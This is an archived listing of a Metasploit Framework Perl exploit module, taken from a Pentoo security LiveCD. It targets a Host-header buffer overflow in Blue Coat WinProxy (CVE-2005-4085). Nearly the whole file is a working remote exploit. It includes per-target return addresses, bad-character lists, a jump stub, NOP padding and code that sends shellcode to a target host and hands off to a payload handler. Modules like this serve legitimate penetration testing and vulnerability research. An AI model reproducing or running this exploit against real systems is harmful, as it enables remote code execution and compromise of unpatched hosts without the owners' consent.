home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / bluecoat_winproxy.pm < prev    next >
Text File  |  2006-06-30  |  4KB  |  149 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::bluecoat_winproxy;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'  => 'Blue Coat Systems WinProxy Host Header Buffer Overflow',
  21.     'Version'  => '$Revision: 1.2 $',
  22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
  25.     'Priv'  => 0,
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 80],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.     'AutoOpts' => { 'EXITFUNC' => 'thread' },
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 600,
  36.         'BadChars'  => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
  37.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  38.         'Keys'      => ['+ws2ord'],
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.         This module exploits a buffer overflow in Blue Coat Systems WinProxy
  43.     HTTP proxy service. This flaw is triggered when the service processes
  44.     a HTTP request that has a long string specified as the HTTP port.
  45.         
  46. }),
  47.  
  48.     'Refs'  =>
  49.       [
  50.           ['OSVDB', '22238'],      
  51.         ['URL', 'http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364'],
  52.         ['CVE', '2005-4085'],
  53.       ],
  54.  
  55.     'Targets' =>
  56.       [
  57.         ['WinProxy 6.0 R1c Universal',     0x6020ba04], # Asmdat.dll
  58.         ['Windows 2000 Pro English ALL',   0x75022ac4], # ws2help.dll
  59.         ['Windows XP Pro SP0/SP1 English', 0x71aa32ad], # ws2help.dll
  60.       ],
  61.  
  62.     'Keys' => ['winproxy'],
  63.  
  64.     'DisclosureDate' => 'January 5 2005',
  65.   };
  66.  
  67. sub new {
  68.     my $class = shift;
  69.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  70.     return($self);
  71. }
  72.  
  73. sub Check {
  74.     my ($self) = @_;
  75.     my $target_host = $self->GetVar('RHOST');
  76.     my $target_port = $self->GetVar('RPORT');
  77.  
  78.     my $getreq =
  79.       "GET / HTTP/1.1". "\r\n".
  80.       "Host: 127.0.0.1". "\r\n\r\n";
  81.  
  82.     my $s = Msf::Socket::Tcp->new
  83.       (
  84.         'PeerAddr'  => $target_host,
  85.         'PeerPort'  => $target_port,
  86.         'LocalPort' => $self->GetVar('CPORT'),
  87.         'SSL'       => $self->GetVar('SSL'),
  88.       );
  89.     if ($s->IsError) {
  90.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  91.         return $self->CheckCode('Connect');
  92.     }
  93.  
  94.     $s->Send($getreq);
  95.     my $res = $s->Recv(-1, 10);
  96.     $s->Close();
  97.  
  98.     if ($res !~ /BlueCoat-WinProxy/)
  99.     {
  100.         $self->PrintLine("[*] BlueCoat-WinProxy is not running =(");
  101.         return $self->CheckCode('Safe');
  102.     }
  103.  
  104.     $self->PrintLine("[*] BlueCoat-WinProxy is running!");
  105.     return $self->CheckCode('Detected');
  106. }
  107.  
  108. sub Exploit
  109. {
  110.     my $self = shift;
  111.     my $target_host = $self->GetVar('RHOST');
  112.     my $target_port = $self->GetVar('RPORT');
  113.     my $target_idx  = $self->GetVar('TARGET');
  114.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  115.     my $target = $self->Targets->[$target_idx];
  116.  
  117.     if (! $self->InitNops(128)) {
  118.         $self->PrintLine("[*] Failed to initialize the nop module.");
  119.         return;
  120.     }
  121.  
  122.     my $sploit =
  123.       "GET / HTTP/1.1". "\r\n".
  124.       "Host: 127.0.0.1:". Pex::Text::AlphaNumText(23).
  125.       "\xeb\x06\x92\x46". pack('V', $target->[1]).
  126.       $shellcode. "\r\n\r\n".
  127.  
  128.       $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  129.  
  130.     my $s = Msf::Socket::Tcp->new
  131.       (
  132.         'PeerAddr'  => $target_host,
  133.         'PeerPort'  => $target_port,
  134.         'LocalPort' => $self->GetVar('CPORT'),
  135.         'SSL'       => $self->GetVar('SSL'),
  136.       );
  137.     if ($s->IsError) {
  138.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  139.         return;
  140.     }
  141.  
  142.     $s->Send($sploit);
  143.     $self->Handler($s);
  144.     $s->Close();
  145.     return;
  146. }
  147.  
  148. 1;
  149.